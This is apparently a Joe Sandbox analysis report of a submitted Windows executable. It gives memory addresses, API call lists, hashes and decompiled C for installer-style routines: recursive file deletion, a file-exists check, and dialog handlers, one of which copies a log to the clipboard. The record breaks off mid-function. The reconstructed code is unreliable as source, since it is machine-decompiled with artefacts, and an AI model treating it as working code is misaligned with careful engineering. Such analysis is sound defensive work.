                                                            0x00000000
                                                            0x73c32490
                                                            0x00000000
                                                            0x73c32490
                                                            0x73c32418
                                                            0x73c32477
                                                            0x00000000
                                                            0x73c32477
                                                            0x73c3241a
                                                            0x73c3241a
                                                            0x73c3241d
                                                            0x73c3246e
                                                            0x00000000
                                                            0x73c3246e
                                                            0x73c3241f
                                                            0x73c3241f
                                                            0x73c32422
                                                            0x73c32467
                                                            0x00000000
                                                            0x73c32467
                                                            0x73c32424
                                                            0x73c32424
                                                            0x73c32427
                                                            0x73c32464
                                                            0x00000000
                                                            0x73c32464
                                                            0x73c3242b
                                                            0x73c3242c
                                                            0x73c3242e
                                                            0x00000000
                                                            0x73c32434
                                                            0x73c32434
                                                            0x00000000
                                                            0x73c32434
                                                            0x73c3242e
                                                            0x73c32453
                                                            0x73c32458
                                                            0x00000000
                                                            0x73c32458
                                                            0x73c32442
                                                            0x73c32446
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32448
                                                            0x73c3244a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c3244a
                                                            0x73c3230e
                                                            0x73c32311
                                                            0x73c32378
                                                            0x73c3237d
                                                            0x73c32382
                                                            0x73c32388
                                                            0x73c32390
                                                            0x73c32390
                                                            0x73c32391
                                                            0x73c32391
                                                            0x73c32399
                                                            0x73c3239e
                                                            0x73c323a2
                                                            0x73c323a4
                                                            0x73c323a9
                                                            0x73c323b1
                                                            0x73c323b6
                                                            0x73c323b8
                                                            0x73c323bd
                                                            0x73c323c3
                                                            0x73c323c9
                                                            0x73c323cc
                                                            0x73c323d1
                                                            0x73c323d6
                                                            0x73c323db
                                                            0x73c323db
                                                            0x73c323df
                                                            0x73c323e3
                                                            0x73c323e5
                                                            0x00000000
                                                            0x00000000
                                                            0x73c323eb
                                                            0x73c323eb
                                                            0x00000000
                                                            0x73c323eb
                                                            0x73c32313
                                                            0x73c32316
                                                            0x73c32335
                                                            0x73c32339
                                                            0x73c3233f
                                                            0x73c32344
                                                            0x73c3234c
                                                            0x73c32351
                                                            0x73c32353
                                                            0x73c32358
                                                            0x73c3235e
                                                            0x73c32364
                                                            0x73c32367
                                                            0x73c3236c
                                                            0x73c32371
                                                            0x00000000
                                                            0x73c32371
                                                            0x73c3231b
                                                            0x00000000
                                                            0x73c32321
                                                            0x73c32323
                                                            0x73c3232c
                                                            0x00000000
                                                            0x73c3232c
                                                            0x73c3231b
                                                            0x73c32901
                                                            0x73c32907
                                                            0x73c3290d
                                                            0x73c32911
                                                            0x73c32a8a

                                                            APIs
                                                              • Part of subcall function 73C312C6: GlobalAlloc.KERNELBASE(00000040,73C311C4,-000000A0), ref: 73C312CE
                                                            • lstrcpyA.KERNEL32(?,?), ref: 73C327C0
                                                            • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 73C3281B
                                                            • lstrcpyA.KERNEL32(00000008,?), ref: 73C3286B
                                                            • lstrcpyA.KERNEL32(00000408,?), ref: 73C32876
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C32887
                                                            • GlobalFree.KERNEL32(?), ref: 73C32901
                                                            • GlobalFree.KERNEL32(?), ref: 73C32907
                                                            • GlobalFree.KERNEL32(?), ref: 73C3290D
                                                            • GetModuleHandleA.KERNEL32(00000008), ref: 73C329D7
                                                            • LoadLibraryA.KERNEL32(00000008), ref: 73C329E8
                                                            • GetProcAddress.KERNEL32(?,?), ref: 73C32A3C
                                                            • lstrlenA.KERNEL32(00000408), ref: 73C32A57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            • Associated: 00000010.00000002.1284008674.0000000073C30000.00000002.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000010.00000002.1284039391.0000000073C34000.00000002.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000010.00000002.1284051137.0000000073C36000.00000002.00000001.01000000.00000008.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                            • String ID: :
                                                            • API String ID: 245916457-336475711
                                                            • Opcode ID: d25f2df8ff0adc324e2589109a4fb99fefd5ae9ca4ec9d4e3c3e0e9352a0125f
                                                            • Instruction ID: 2142480f09b700e85bf85a556043c0a1f015f209a7f9cd795f207542c31761e4
                                                            • Opcode Fuzzy Hash: d25f2df8ff0adc324e2589109a4fb99fefd5ae9ca4ec9d4e3c3e0e9352a0125f
                                                            • Instruction Fuzzy Hash: 0A32D27260830A9FDB45DF35C44075ABBF5FF8A314F858A2DE49ACA294DB30D9458B83
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 98%
                                                            			E00405A19(void* __eflags, signed int _a4, signed int _a8) {
                                                            				signed int _v8;
                                                            				void* _v12;
                                                            				signed int _v16;
                                                            				struct _WIN32_FIND_DATAA _v336;
                                                            				signed int _t40;
                                                            				char* _t53;
                                                            				signed int _t55;
                                                            				signed int _t58;
                                                            				signed int _t64;
                                                            				signed int _t66;
                                                            				void* _t68;
                                                            				signed char _t69;
                                                            				CHAR* _t71;
                                                            				void* _t72;
                                                            				CHAR* _t73;
                                                            				char* _t76;
                                                            
                                                            				_t69 = _a8;
                                                            				_t73 = _a4;
                                                            				_v8 = _t69 & 0x00000004;
                                                            				_t40 = E00405CD7(__eflags, _t73);
                                                            				_v16 = _t40;
                                                            				if((_t69 & 0x00000008) != 0) {
                                                            					_t66 = DeleteFileA(_t73); // executed
                                                            					asm("sbb eax, eax");
                                                            					_t68 =  ~_t66 + 1;
                                                            					 *0x4524a8 =  *0x4524a8 + _t68;
                                                            					return _t68;
                                                            				}
                                                            				_a4 = _t69;
                                                            				_t8 =  &_a4;
                                                            				 *_t8 = _a4 & 0x00000001;
                                                            				__eflags =  *_t8;
                                                            				if( *_t8 == 0) {
                                                            					L5:
                                                            					E00406257(0x444098, _t73);
                                                            					__eflags = _a4;
                                                            					if(_a4 == 0) {
                                                            						E00405C30(_t73);
                                                            					} else {
                                                            						lstrcatA(0x444098, "\*.*");
                                                            					}
                                                            					__eflags =  *_t73;
                                                            					if( *_t73 != 0) {
                                                            						L10:
                                                            						lstrcatA(_t73, 0x40a014);
                                                            						L11:
                                                            						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                            						_t40 = FindFirstFileA(0x444098,  &_v336);
                                                            						__eflags = _t40 - 0xffffffff;
                                                            						_v12 = _t40;
                                                            						if(_t40 == 0xffffffff) {
                                                            							L29:
                                                            							__eflags = _a4;
                                                            							if(_a4 != 0) {
                                                            								_t32 = _t71 - 1;
                                                            								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                            								__eflags =  *_t32;
                                                            							}
                                                            							goto L31;
                                                            						} else {
                                                            							goto L12;
                                                            						}
                                                            						do {
                                                            							L12:
                                                            							_t76 =  &(_v336.cFileName);
                                                            							_t53 = E00405C14( &(_v336.cFileName), 0x3f);
                                                            							__eflags =  *_t53;
                                                            							if( *_t53 != 0) {
                                                            								__eflags = _v336.cAlternateFileName;
                                                            								if(_v336.cAlternateFileName != 0) {
                                                            									_t76 =  &(_v336.cAlternateFileName);
                                                            								}
                                                            							}
                                                            							__eflags =  *_t76 - 0x2e;
                                                            							if( *_t76 != 0x2e) {
                                                            								L19:
                                                            								E00406257(_t71, _t76);
                                                            								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                            								if(__eflags == 0) {
                                                            									_t55 = E004059D1(__eflags, _t73, _v8);
                                                            									__eflags = _t55;
                                                            									if(_t55 != 0) {
                                                            										E00405378(0xfffffff2, _t73);
                                                            									} else {
                                                            										__eflags = _v8 - _t55;
                                                            										if(_v8 == _t55) {
                                                            											 *0x4524a8 =  *0x4524a8 + 1;
                                                            										} else {
                                                            											E00405378(0xfffffff1, _t73);
                                                            											E00406030(_t72, _t73, 0);
                                                            										}
                                                            									}
                                                            								} else {
                                                            									__eflags = (_a8 & 0x00000003) - 3;
                                                            									if(__eflags == 0) {
                                                            										E00405A19(__eflags, _t73, _a8);
                                                            									}
                                                            								}
                                                            								goto L27;
                                                            							}
                                                            							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                            							__eflags = _t64;
                                                            							if(_t64 == 0) {
                                                            								goto L27;
                                                            							}
                                                            							__eflags = _t64 - 0x2e;
                                                            							if(_t64 != 0x2e) {
                                                            								goto L19;
                                                            							}
                                                            							__eflags =  *((char*)(_t76 + 2));
                                                            							if( *((char*)(_t76 + 2)) == 0) {
                                                            								goto L27;
                                                            							}
                                                            							goto L19;
                                                            							L27:
                                                            							_t58 = FindNextFileA(_v12,  &_v336);
                                                            							__eflags = _t58;
                                                            						} while (_t58 != 0);
                                                            						_t40 = FindClose(_v12);
                                                            						goto L29;
                                                            					}
                                                            					__eflags =  *0x444098 - 0x5c;
                                                            					if( *0x444098 != 0x5c) {
                                                            						goto L11;
                                                            					}
                                                            					goto L10;
                                                            				} else {
                                                            					__eflags = _t40;
                                                            					if(_t40 == 0) {
                                                            						L31:
                                                            						__eflags = _a4;
                                                            						if(_a4 == 0) {
                                                            							L39:
                                                            							return _t40;
                                                            						}
                                                            						__eflags = _v16;
                                                            						if(_v16 != 0) {
                                                            							_t40 = E004065CE(_t73);
                                                            							__eflags = _t40;
                                                            							if(_t40 == 0) {
                                                            								goto L39;
                                                            							}
                                                            							E00405BE9(_t73);
                                                            							_t40 = E004059D1(__eflags, _t73, _v8 | 0x00000001);
                                                            							__eflags = _t40;
                                                            							if(_t40 != 0) {
                                                            								return E00405378(0xffffffe5, _t73);
                                                            							}
                                                            							__eflags = _v8;
                                                            							if(_v8 == 0) {
                                                            								goto L33;
                                                            							}
                                                            							E00405378(0xfffffff1, _t73);
                                                            							return E00406030(_t72, _t73, 0);
                                                            						}
                                                            						L33:
                                                            						 *0x4524a8 =  *0x4524a8 + 1;
                                                            						return _t40;
                                                            					}
                                                            					__eflags = _t69 & 0x00000002;
                                                            					if((_t69 & 0x00000002) == 0) {
                                                            						goto L31;
                                                            					}
                                                            					goto L5;
                                                            				}
                                                            			}



















                                                            0x00405baa
                                                            0x00405bac
                                                            0x00000000
                                                            0x00000000
                                                            0x00405baf
                                                            0x00405bbb
                                                            0x00405bc0
                                                            0x00405bc2
                                                            0x00000000
                                                            0x00405bdd
                                                            0x00405bc4
                                                            0x00405bc7
                                                            0x00000000
                                                            0x00000000
                                                            0x00405bcc
                                                            0x00000000
                                                            0x00405bd3
                                                            0x00405b9c
                                                            0x00405b9c
                                                            0x00000000
                                                            0x00405b9c
                                                            0x00405a69
                                                            0x00405a6c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405a6c

                                                            APIs
                                                            • DeleteFileA.KERNELBASE(?,?,75572754,00485000,0047B000), ref: 00405A42
                                                            • lstrcatA.KERNEL32(00444098,\*.*,00444098,?,?,75572754,00485000,0047B000), ref: 00405A8A
                                                            • lstrcatA.KERNEL32(?,0040A014,?,00444098,?,?,75572754,00485000,0047B000), ref: 00405AAB
                                                            • lstrlenA.KERNEL32(?,?,0040A014,?,00444098,?,?,75572754,00485000,0047B000), ref: 00405AB1
                                                            • FindFirstFileA.KERNEL32(00444098,?,?,?,0040A014,?,00444098,?,?,75572754,00485000,0047B000), ref: 00405AC2
                                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6F
                                                            • FindClose.KERNEL32(00000000), ref: 00405B80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: \*.*
                                                            • API String ID: 2035342205-1173974218
                                                            • Opcode ID: 72fcfd17838b05b299cf9498f91550db9d519d78778f82521e10bef42cbcf41b
                                                            • Instruction ID: 7373f7c24065ba85377ce78181eb49bf834506ffe63cf7a55ce9c7ac78545b15
                                                            • Opcode Fuzzy Hash: 72fcfd17838b05b299cf9498f91550db9d519d78778f82521e10bef42cbcf41b
                                                            • Instruction Fuzzy Hash: 4651DE30904A08AADB22AB618C89BAF7B78DF42314F24417BF441752D2C77CA981DE6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004065CE(CHAR* _a4) {
                                                            				void* _t2;
                                                            
                                                            				_t2 = FindFirstFileA(_a4, 0x4480e0); // executed
                                                            				if(_t2 == 0xffffffff) {
                                                            					return 0;
                                                            				}
                                                            				FindClose(_t2); // executed
                                                            				return 0x4480e0;
                                                            			}





                                                            APIs
                                                            • FindFirstFileA.KERNELBASE(00000020,004480E0,00446098,00405D1A,00446098,00446098,00000000,00446098,00446098,T'Wu,?,00485000,00405A39,?,75572754,00485000), ref: 004065D9
                                                            • FindClose.KERNELBASE(00000000), ref: 004065E5
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 91897166837ccdaf6e79e8037e8f47a8f79e1353e4b75f269b86cd68fbfe55b9
                                                            • Instruction ID: fd41d54537010d52f50df7b9b8b9e3478e19d392ae6c51f4a024acc321f66cb9
                                                            • Opcode Fuzzy Hash: 91897166837ccdaf6e79e8037e8f47a8f79e1353e4b75f269b86cd68fbfe55b9
                                                            • Instruction Fuzzy Hash: 89D01231514520ABD7516B38BD0C85B7A58AF053313228A3AF066F22E4CF34CC22969C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 144 4054b6-4054d2 145 405661-405667 144->145 146 4054d8-40559f GetDlgItem * 3 call 404309 call 404bfa GetClientRect GetSystemMetrics SendMessageA * 2 144->146 148 405691-40569d 145->148 149 405669-40568b GetDlgItem CreateThread CloseHandle 145->149 166 4055a1-4055bb SendMessageA * 2 146->166 167 4055bd-4055c0 146->167 151 4056bf-4056c5 148->151 152 40569f-4056a5 148->152 149->148 156 4056c7-4056cd 151->156 157 40571a-40571d 151->157 154 4056e0-4056e7 call 40433b 152->154 155 4056a7-4056ba ShowWindow * 2 call 404309 152->155 170 4056ec-4056f0 154->170 155->151 161 4056f3-405703 ShowWindow 156->161 162 4056cf-4056db call 4042ad 156->162 157->154 159 40571f-405725 157->159 159->154 168 405727-40573a SendMessageA 159->168 164 405713-405715 call 4042ad 161->164 165 405705-40570e call 405378 161->165 162->154 164->157 165->164 166->167 173 4055d0-4055e7 call 4042d4 167->173 174 4055c2-4055ce SendMessageA 167->174 175 405740-40576c CreatePopupMenu call 4062ea AppendMenuA 168->175 176 405837-405839 168->176 183 4055e9-4055fd ShowWindow 173->183 184 40561d-40563e GetDlgItem SendMessageA 173->184 174->173 181 405781-405797 TrackPopupMenu 175->181 182 40576e-40577e GetWindowRect 175->182 176->170 181->176 186 40579d-4057b7 181->186 182->181 187 40560c 183->187 188 4055ff-40560a ShowWindow 183->188 184->176 185 405644-40565c SendMessageA * 2 184->185 185->176 189 4057bc-4057d7 SendMessageA 186->189 190 405612-405618 call 404309 187->190 188->190 189->189 191 4057d9-4057f9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 189->191 190->184 193 4057fb-40581b SendMessageA 191->193 193->193 194 40581d-405831 GlobalUnlock SetClipboardData CloseClipboard 193->194 194->176
                                                            C-Code - Quality: 95%
                                                            			E004054B6(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                            				struct HWND__* _v8;
                                                            				struct tagRECT _v24;
                                                            				void* _v32;
                                                            				signed int _v36;
                                                            				int _v40;
                                                            				int _v44;
                                                            				signed int _v48;
                                                            				int _v52;
                                                            				void* _v56;
                                                            				void* _v64;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				struct HWND__* _t89;
                                                            				long _t90;
                                                            				int _t95;
                                                            				void* _t102;
                                                            				intOrPtr _t113;
                                                            				void* _t121;
                                                            				intOrPtr _t124;
                                                            				struct HWND__* _t128;
                                                            				int _t150;
                                                            				int _t153;
                                                            				long _t157;
                                                            				struct HWND__* _t161;
                                                            				struct HMENU__* _t163;
                                                            				long _t165;
                                                            				void* _t166;
                                                            				char* _t167;
                                                            				char* _t168;
                                                            				int _t169;
                                                            
                                                            				_t157 = _a8;
                                                            				_t150 = 0;
                                                            				_v8 =  *0x44e404;
                                                            				if(_t157 != 0x110) {
                                                            					if(_t157 == 0x405) {
                                                            						_t121 = CreateThread(0, 0, E0040544A, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
                                                            						CloseHandle(_t121);
                                                            					}
                                                            					if(_t157 != 0x111) {
                                                            						L17:
                                                            						if(_t157 != 0x404) {
                                                            							L25:
                                                            							if(_t157 != 0x7b) {
                                                            								goto L20;
                                                            							}
                                                            							_t89 = _v8;
                                                            							if(_a12 != _t89) {
                                                            								goto L20;
                                                            							}
                                                            							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                            							_a12 = _t90;
                                                            							if(_t90 <= _t150) {
                                                            								L36:
                                                            								return 0;
                                                            							}
                                                            							_t163 = CreatePopupMenu();
                                                            							AppendMenuA(_t163, _t150, 1, E004062EA(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                            							_t95 = _a16;
                                                            							_t153 = _a16 >> 0x10;
                                                            							if(_a16 == 0xffffffff) {
                                                            								GetWindowRect(_v8,  &_v24);
                                                            								_t95 = _v24.left;
                                                            								_t153 = _v24.top;
                                                            							}
                                                            							if(TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150) == 1) {
                                                            								_t165 = 1;
                                                            								_v56 = _t150;
                                                            								_v44 = 0x43c090;
                                                            								_v40 = 0x8000;
                                                            								_a4 = _a12;
                                                            								do {
                                                            									_a4 = _a4 - 1;
                                                            									_t165 = _t165 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
                                                            								} while (_a4 != _t150);
                                                            								OpenClipboard(_t150);
                                                            								EmptyClipboard();
                                                            								_t102 = GlobalAlloc(0x42, _t165);
                                                            								_a4 = _t102;
                                                            								_t166 = GlobalLock(_t102);
                                                            								do {
                                                            									_v44 = _t166;
                                                            									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                            									 *_t167 = 0xd;
                                                            									_t168 = _t167 + 1;
                                                            									 *_t168 = 0xa;
                                                            									_t166 = _t168 + 1;
                                                            									_t150 = _t150 + 1;
                                                            								} while (_t150 < _a12);
                                                            								GlobalUnlock(_a4);
                                                            								SetClipboardData(1, _a4);
                                                            								CloseClipboard();
                                                            							}
                                                            							goto L36;
                                                            						}
                                                            						if( *0x44e3ec == _t150) {
                                                            							ShowWindow( *0x452428, 8);
                                                            							if( *0x4524ac == _t150) {
                                                            								_t113 =  *0x438068; // 0x601114
                                                            								E00405378( *((intOrPtr*)(_t113 + 0x34)), _t150);
                                                            							}
                                                            							E004042AD(1);
                                                            							goto L25;
                                                            						}
                                                            						 *0x436060 = 2;
                                                            						E004042AD(0x78);
                                                            						goto L20;
                                                            					} else {
                                                            						if(_a12 != 0x403) {
                                                            							L20:
                                                            							return E0040433B(_t157, _a12, _a16);
                                                            						}
                                                            						ShowWindow( *0x44e3f0, _t150);
                                                            						ShowWindow(_v8, 8);
                                                            						E00404309(_v8);
                                                            						goto L17;
                                                            					}
                                                            				}
                                                            				_v48 = _v48 | 0xffffffff;
                                                            				_v36 = _v36 | 0xffffffff;
                                                            				_t169 = 2;
                                                            				_v56 = _t169;
                                                            				_v52 = 0;
                                                            				_v44 = 0;
                                                            				_v40 = 0;
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				_t124 =  *0x452430;
                                                            				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                            				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                            				 *0x44e3f0 = GetDlgItem(_a4, 0x403);
                                                            				 *0x44e3e8 = GetDlgItem(_a4, 0x3ee);
                                                            				_t128 = GetDlgItem(_a4, 0x3f8);
                                                            				 *0x44e404 = _t128;
                                                            				_v8 = _t128;
                                                            				E00404309( *0x44e3f0);
                                                            				 *0x44e3f4 = E00404BFA(4);
                                                            				 *0x44e40c = 0;
                                                            				GetClientRect(_v8,  &_v24);
                                                            				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                            				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                            				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                            				if(_a12 >= 0) {
                                                            					SendMessageA(_v8, 0x1001, 0, _a12);
                                                            					SendMessageA(_v8, 0x1026, 0, _a12);
                                                            				}
                                                            				if(_a8 >= _t150) {
                                                            					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                            				}
                                                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                            				_push(0x1b);
                                                            				E004042D4(_a4);
                                                            				if(( *0x452438 & 0x00000003) != 0) {
                                                            					ShowWindow( *0x44e3f0, _t150); // executed
                                                            					if(( *0x452438 & 0x00000002) != 0) {
                                                            						 *0x44e3f0 = _t150;
                                                            					} else {
                                                            						ShowWindow(_v8, 8); // executed
                                                            					}
                                                            					E00404309( *0x44e3e8);
                                                            				}
                                                            				_t161 = GetDlgItem(_a4, 0x3ec);
                                                            				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                            				if(( *0x452438 & 0x00000004) != 0) {
                                                            					SendMessageA(_t161, 0x409, _t150, _a8);
                                                            					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                            				}
                                                            				goto L36;
                                                            			}

                                                            APIs
                                                            • GetDlgItem.USER32(?,00000403), ref: 00405515
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405524
                                                            • GetClientRect.USER32 ref: 00405561
                                                            • GetSystemMetrics.USER32 ref: 00405568
                                                            • SendMessageA.USER32 ref: 00405589
                                                            • SendMessageA.USER32 ref: 0040559A
                                                            • SendMessageA.USER32 ref: 004055AD
                                                            • SendMessageA.USER32 ref: 004055BB
                                                            • SendMessageA.USER32 ref: 004055CE
                                                            • ShowWindow.USER32(00000000,?), ref: 004055F0
                                                            • ShowWindow.USER32(?,00000008), ref: 00405604
                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405625
                                                            • SendMessageA.USER32 ref: 00405635
                                                            • SendMessageA.USER32 ref: 0040564E
                                                            • SendMessageA.USER32 ref: 0040565A
                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405533
                                                              • Part of subcall function 00404309: SendMessageA.USER32 ref: 00404317
                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405676
                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_0000544A,00000000), ref: 00405684
                                                            • CloseHandle.KERNELBASE(00000000), ref: 0040568B
                                                            • ShowWindow.USER32(00000000), ref: 004056AE
                                                            • ShowWindow.USER32(?,00000008), ref: 004056B5
                                                            • ShowWindow.USER32(00000008), ref: 004056FB
                                                            • SendMessageA.USER32 ref: 0040572F
                                                            • CreatePopupMenu.USER32 ref: 00405740
                                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405755
                                                            • GetWindowRect.USER32(?,000000FF), ref: 00405775
                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578E
                                                            • SendMessageA.USER32 ref: 004057CA
                                                            • OpenClipboard.USER32(00000000), ref: 004057DA
                                                            • EmptyClipboard.USER32 ref: 004057E0
                                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 004057E9
                                                            • GlobalLock.KERNEL32 ref: 004057F3
                                                            • SendMessageA.USER32 ref: 00405807
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405820
                                                            • SetClipboardData.USER32 ref: 0040582B
                                                            • CloseClipboard.USER32 ref: 00405831
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                            • String ID:
                                                            • API String ID: 590372296-0
                                                            • Opcode ID: 746edb2a2778025f9de9b77bb3992fa6aedd30c2e25b648fc8e79c3d49393592
                                                            • Instruction ID: a29ac8d60da1fb34f4aa2469bcdf397c87ff466403413f05bd0ae09002c56f5c
                                                            • Opcode Fuzzy Hash: 746edb2a2778025f9de9b77bb3992fa6aedd30c2e25b648fc8e79c3d49393592
                                                            • Instruction Fuzzy Hash: 7BA16BB1900608BFEB119F64DE89EAE7B79FB08354F00403AFA45B61A1CB754E51DF68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 84%
                                                            			E00403DDA(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                            				struct HWND__* _v28;
                                                            				void* _v84;
                                                            				void* _v88;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t32;
                                                            				signed int _t34;
                                                            				signed int _t36;
                                                            				struct HWND__* _t46;
                                                            				signed int _t65;
                                                            				struct HWND__* _t71;
                                                            				signed int _t84;
                                                            				struct HWND__* _t89;
                                                            				signed int _t97;
                                                            				int _t101;
                                                            				signed int _t115;
                                                            				int _t116;
                                                            				int _t120;
                                                            				signed int _t122;
                                                            				struct HWND__* _t125;
                                                            				struct HWND__* _t126;
                                                            				int _t127;
                                                            				intOrPtr _t128;
                                                            				long _t131;
                                                            				int _t133;
                                                            				int _t134;
                                                            				void* _t135;
                                                            
                                                            				_t128 = _a8;
                                                            				if(_t128 == 0x110 || _t128 == 0x408) {
                                                            					_t32 = _a12;
                                                            					_t125 = _a4;
                                                            					__eflags = _t128 - 0x110;
                                                            					 *0x43c078 = _t32;
                                                            					if(_t128 == 0x110) {
                                                            						 *0x452428 = _t125;
                                                            						 *0x43c08c = GetDlgItem(_t125, 1);
                                                            						_t89 = GetDlgItem(_t125, 2);
                                                            						_push(0xffffffff);
                                                            						_push(0x1c);
                                                            						 *0x434058 = _t89;
                                                            						E004042D4(_t125);
                                                            						SetClassLongA(_t125, 0xfffffff2,  *0x44e408);
                                                            						 *0x44e3ec = E0040140B(4);
                                                            						_t32 = 1;
                                                            						__eflags = 1;
                                                            						 *0x43c078 = 1;
                                                            					}
                                                            					_t122 =  *0x40a1dc; // 0x0
                                                            					_t134 = 0;
                                                            					_t131 = (_t122 << 6) +  *0x452440;
                                                            					__eflags = _t122;
                                                            					if(_t122 < 0) {
                                                            						L36:
                                                            						E00404320(0x40b);
                                                            						while(1) {
                                                            							_t34 =  *0x43c078;
                                                            							 *0x40a1dc =  *0x40a1dc + _t34;
                                                            							_t131 = _t131 + (_t34 << 6);
                                                            							_t36 =  *0x40a1dc; // 0x0
                                                            							__eflags = _t36 -  *0x452444;
                                                            							if(_t36 ==  *0x452444) {
                                                            								E0040140B(1);
                                                            							}
                                                            							__eflags =  *0x44e3ec - _t134;
                                                            							if( *0x44e3ec != _t134) {
                                                            								break;
                                                            							}
                                                            							__eflags =  *0x40a1dc -  *0x452444; // 0x0
                                                            							if(__eflags >= 0) {
                                                            								break;
                                                            							}
                                                            							_t115 =  *(_t131 + 0x14);
                                                            							E004062EA(_t115, _t125, _t131, 0x48f000,  *((intOrPtr*)(_t131 + 0x24)));
                                                            							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                            							_push(0xfffffc19);
                                                            							E004042D4(_t125);
                                                            							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                            							_push(0xfffffc1b);
                                                            							E004042D4(_t125);
                                                            							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                            							_push(0xfffffc1a);
                                                            							E004042D4(_t125);
                                                            							_t46 = GetDlgItem(_t125, 3);
                                                            							__eflags =  *0x4524ac - _t134;
                                                            							_v28 = _t46;
                                                            							if( *0x4524ac != _t134) {
                                                            								_t115 = _t115 & 0x0000fefd | 0x00000004;
                                                            								__eflags = _t115;
                                                            							}
                                                            							ShowWindow(_t46, _t115 & 0x00000008); // executed
                                                            							EnableWindow( *(_t135 + 0x34), _t115 & 0x00000100); // executed
                                                            							E004042F6(_t115 & 0x00000002);
                                                            							_t116 = _t115 & 0x00000004;
                                                            							EnableWindow( *0x434058, _t116);
                                                            							__eflags = _t116 - _t134;
                                                            							if(_t116 == _t134) {
                                                            								_push(1);
                                                            							} else {
                                                            								_push(_t134);
                                                            							}
                                                            							EnableMenuItem(GetSystemMenu(_t125, _t134), 0xf060, ??);
                                                            							SendMessageA( *(_t135 + 0x3c), 0xf4, _t134, 1);
                                                            							__eflags =  *0x4524ac - _t134;
                                                            							if( *0x4524ac == _t134) {
                                                            								_push( *0x43c08c);
                                                            							} else {
                                                            								SendMessageA(_t125, 0x401, 2, _t134);
                                                            								_push( *0x434058);
                                                            							}
                                                            							E00404309();
                                                            							E00406257(0x43c090, E00403DBB());
                                                            							E004062EA(0x43c090, _t125, _t131,  &(0x43c090[lstrlenA(0x43c090)]),  *((intOrPtr*)(_t131 + 0x18)));
